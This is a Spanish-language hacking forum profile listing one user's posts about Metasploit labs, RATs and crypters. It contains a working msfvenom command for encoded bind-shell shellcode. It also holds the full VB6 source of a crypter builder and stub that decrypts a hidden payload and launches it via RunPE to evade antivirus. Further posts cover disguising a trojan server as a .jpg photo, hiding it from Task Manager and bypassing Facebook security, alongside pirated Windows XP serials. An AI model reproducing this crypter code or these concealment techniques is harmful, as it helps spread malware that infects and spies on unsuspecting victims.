Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - mcr_bkn

Páginas: [1] 2
1
HOla amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y
meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas
en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener
acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:





http://www.subirimagenes.net/i/131027114712988939.jpg


Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!

2
Cualquiera de los 2 te servira para pruebas de pentest,
te dejo el link del XP SP3 : http://depositfiles.org/files/87wkp8mup?redirect

seriales:

JDRWX-463P6-FQRCH-GG44T-J4FVQ
J2CY6-TP66F-PM48K-9Y4TF-JTYBQ
JPWBM-J9KFF-YRPFD-QMJPR-22PCW
7QVT6-T2738-WRKJB-YKRFQ-XVK98
B77QF-DP27W-4H68R-72B48-78RPD
Saludos !


Gracias bro!!!! vamos a probar con este win xp sp3 a ver como me vas!!! saludos a todos!!!

3
Amigos, tengo una consulta estoy comenzando con las pruebas de pentest y tengo una duda, para comenzar varios tutos recomiendan win xp sp2 pero sera recomendable empezar a la fecha con win xp sp3??? y si alguien tiene las ISO que pueda compartir para descargarlas, estas deben tener alguna configuraciòn en especial??

4
Estimado amigos, quería hacer una consulta a ver si me pueden ayudar. Siempre he tenido problemas con los RAT (Spynet y Darkcomet) en el sentido cuando el remoto lo ejecuta 2 o 3 veces... tengo que ir a administrador de tareas y cerrar un server para que pueda entrar a windows, llegue a la conclusión (ratifiquen si estoy en lo cierto), que escribe en el mismo registro de windows la veces que se ejecuta y esto causa varios problemas (ver fotos adjuntas). A ver si me pueden ayudar a solucionar esto, tenia pensado en agregarle al crypter (realizado en vb6) un modulo que verifique si esta escrito en el registro no ejecute el server, googleando encontre esto: http://foro.elhacker.net/programacion_vb/modificar_regedit_usando_visual_basic-t245654.0.html publicado por karcrack, pero no logro hacerlo funcionar para lo que yo quiero... bueno eso... espero puedan ayudarme y de ante mano muchas gracias!!!



http://subefotos.com/ver/?6f72c15c0870f1f08c004871c55f1263o.jpg



http://subefotos.com/ver/?597060d4af64f1a32a728f8cb3969aaeo.jpg

5
Dudas y pedidos generales / Re:win8 y bt5 r3 notebok UEFI boot
« en: Enero 18, 2013, 03:52:50 pm »
Solo queria probar bt5, pero al Instalar los repos igual se instalan los programas de bt5?

6
Hola amigos del foro, espero puedan ayudarme. Hce poco me compre un pc nuevo :D y a la sorpresa de querer instalarle otro SO (backtrack5) me encontre con la sorpresa que no se podia. Investigue y me encontre q los nuavos pc (con windows 8) tiene UEFI boot, googleando encontre que ubuntu 12.10 es compatible con UEFI, pero yo queria probar backtrack 5. No he encontrado nada concreto a ver si alguien que le haya pasado lo mismo pueda ayudarme.

Saludos!!!

7
Off Topic / Re:De que pais eres?
« en: Enero 17, 2013, 03:32:46 am »
Yo soy de Chile!!!! igual que mis compatriotas DLV, ELBARTOkpc y BCKTR1X viva chile y el hacking chileno jejeje!!! Saludos a todos...!!!

8
Talleres Underc0de / Re:Taller de Python #1
« en: Enero 08, 2013, 07:28:57 am »
Muy buena Antrax!!!! vamos a chequearlo se ve super interesante...!!! esta de lujo para adentrarse al lenguaje... Saludos!!

9
Tutoriales y Manuales de Malwares / Re:Spofear .exe por .jpg por McR
« en: Enero 03, 2013, 05:41:57 pm »
mira el archivo final que te queda y que contiene el server te quedaria Foto Sexe.jpg

pero mas explicado esta en el video...

Saludos espero te sirva saludos...

10
Tutoriales y Manuales de Malwares / Spofear .exe por .jpg por McR
« en: Enero 03, 2013, 12:53:38 am »
Estimados amigos, alomejor un tema un poco repetitivo pero le comparto un video que hice hace un tiempo (para principiantes) y lo queria compartir aca en underc0de!!! :) bueno este método tiene mi estampa pero sacando ideas de varios lados...  bueno acá esta el link...

Link: http://www.mediafire.com/?o5goy7121jidot

Pass: mcr_hack


Nota: Les aconsejo mejorar la configurar del Sfx Compiler ya que la q esta en el vídeo creara una carpeta en C: hay una opción para guardar los archivos en la carpeta Temp, no lo quise hacer de nuevo ya q me dio un poco de flojera jejejeje... Bueno es mi primer vídeo tutorial espero les sirva Saludos!!!

11
Off Topic / Re:Underc0de les desea un muy feliz año nuevo!
« en: Enero 01, 2013, 06:50:46 pm »
Igualmente Antrax, muy feliz año para ti y a todos los del foro...

12
Hacking / Re:Enviar mail anonimos y fakes
« en: Diciembre 18, 2012, 11:19:39 am »
Gracias bro va a hacer de mucha ayuda... :)

13
Hacking / Re:Fake hotmail (By Aryenal)
« en: Diciembre 16, 2012, 10:15:56 am »
Gracias bro!!! saludos... haces muy buenos aportes....

14
Hola amigo, esto funcionara para saltar la seguridad de facebook?

15
Códigos Fuentes / Re:XOR encryption ASM
« en: Diciembre 12, 2012, 12:08:52 am »
nadie sabe que pasa??

16
Dudas y pedidos generales / Re:Problema con el Spynet2.6
« en: Diciembre 10, 2012, 11:39:04 pm »
eso es por el proceso que lo inyectas!!! cambia al proceso que inyectas al remoto!!!

P.D. no uses la apología infectar, va contra las reglas...!!

17
Códigos Fuentes / Re:XOR encryption ASM
« en: Diciembre 06, 2012, 03:59:20 pm »
Bro gracias por la ayuda!! el runpe es de pink y los códigos son los siguientes:


 stub:

Código: [Seleccionar]
Dim Yopo As String, Clave As String, Jclas As New Class1, Archivo As String, dattos() As Byte



Sub Main()

Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Yopo = Space(LOF(1))
Get #1, , Yopo
Close #1

Clave = Split(Yopo, "~<{symphonatik}>~")(1)
Archivo = Split(Yopo, "~<{symphonatik}>~")(2)

Archivo = Jclas.DecryptString(Archivo, Clave)

dattos() = StrConv(Archivo, vbFromUnicode)
Call RunPE(App.Path & "\" & App.EXEName & ".exe", dattos())

End Sub




Builder:

Código: [Seleccionar]
Dim origenStub As String

Public Function sRndStr(sLen As Long) As String
'Autor: Slek
'Propósito: Generar una Str Aleatoria
'v.1 Indetectables.net
Dim lPos As Long, i As Long
Const Str As String = "$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz"

Randomize Timer
For i = 1 To sLen
lPos = Rnd * 14373 Mod Len(Str)

sRndStr = sRndStr & Mid(Str, lPos + 1, 1)
Next i
End Function
Private Sub CEncriptar_Click()
Dim Origen As String, Destino As String, Cifrado As String, hatsune() As Byte, miku As String, archivo As String, Jclas As New Class1

With CD
.DialogTitle = "Archivo a encriptar..."
.Filter = "todos los archivos|*.*"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
Origen = CD.Filename
End If

With CD
.DialogTitle = "Donde guardaras el archivo..."
.Filter = "Archivo ejecutable|*.exe"
.ShowSave
End With
If CD.Filename <> vbNullString Then
Destino = CD.Filename
End If

Cifrado = sRndStr(49)


Open Origen For Binary As #1
archivo = Space(LOF(1))
Get #1, , archivo
Close #1

archivo = Jclas.EncryptString(archivo, Cifrado)


Open origenStub For Binary As #1
miku = Space(LOF(1))
Get #1, , miku
Close #1

Open Destino For Binary As #1
Put #1, , miku
Put #1, , "~<{symphonatik}>~"
Put #1, , Cifrado
Put #1, , "~<{symphonatik}>~"
Put #1, , archivo
Close #1

MsgBox "que lo disfrutes!!!"

End Sub

Public Sub CSelStub_Click()

With CD
.DialogTitle = "Selecciona el stub..."
.Filter = "ejecutables|*.exe"
.ShowOpen
End With
If CD.Filename <> vbNullString Then
origenStub = CD.Filename
End If

CEncriptar.Enabled = True
End Sub

18
Códigos Fuentes / Re:XOR encryption ASM
« en: Diciembre 05, 2012, 08:20:54 pm »
Estuve chequeando esta encriptación y no la puedo echar a correr... a ver si me pueden ayudar... estoy haciendo un crypter en vb6, la función de encriptación es "ASMXORString" esta misma se usa en el stub??? para descriptar... me sale error 9... al encriptar una bolita... a ver si me pueden ayudar...

19
Dudas y pedidos generales / Re:[Consulta] Ocultar troyano adm. de tarea
« en: Diciembre 05, 2012, 07:34:55 pm »
Por si no me fije bien, pero Darkcomet no me da la opcion de inyectare en un proceso... y lo q dice sanko alguien que lo haga desde vb6???

20
Dudas y pedidos generales / [SOLUCIONADO] Ocultar troyano adm. de tarea
« en: Diciembre 04, 2012, 04:01:29 am »
Estimados amigos, probando con darkcomet 5.3.1 desde mi pc escritorio, me di cuenta que en el administrador de tareas aparece el troyano (en aplicaciones y procesos) quiero saber si el RAT tiene una opcion para ocultarlo o si esto depende del crypter... a ver si me pueden ayudar..!!! Saludos...

Páginas: [1] 2